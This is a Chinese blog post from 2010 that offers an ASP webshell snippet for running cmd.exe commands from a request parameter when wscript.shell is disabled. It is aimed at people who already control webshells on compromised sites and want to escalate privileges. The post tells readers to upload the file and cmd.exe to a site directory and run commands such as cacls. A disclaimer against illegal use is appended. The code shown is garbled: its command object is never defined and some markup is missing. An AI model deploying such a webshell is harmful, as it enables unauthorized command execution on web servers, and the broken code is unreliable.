突破wscript.shell被禁提权

作者:苦咖啡日期:2010-01-21

字体大小: 小中大

可能很多人手上有很多的webshell，可都是因为提权的时候不是因为权限低就是因为wscript.shell被禁用无法执行CMD，现在可以用以下代码
把下面代码复制：

程序代码

<%if err then%>

<%
end if
response.write("

")<br/>On Error Resume Next<br/>response.write oScriptlhn.exec("cmd.exe /c" & request("c")).stdout.readall<br/>response.write("

")
response.write("")
%>

保存为一个asp文件，然后传到网站目录上去，试着再上传个cmd.exe然后把路径写入上面代码。
然后可以运行过cacls之类的命令。
如果权限限制了某些特殊代码执行，则上面代码无效

本文只供技术交流，请误非法使用，后果自负

文章来自: 本站原创

引用通告: 查看所有引用 | 我要引用此文章

Tags: wscript.shell 提权

相关日志:

评论: 0 | 引用: 0 | 查看次数: 839

发表评论

昵　称:
密　码:	游客发言不需要密码.
邮　箱:	支持Gravatar头像.
网　址:	输入网址便于回访.
内　容:	正在加载编辑器...
验证码:	点击获取验证码
选　项:	禁止表情转换禁止自动转换链接禁止自动转换关键字记住我的信息,以便下次评论时不用输入用户名.

虽然发表评论不用注册，但是为了保护您的发言权，建议您注册帐号. 字数限制 1000 字 \| UBB代码开启 \| [img]标签关闭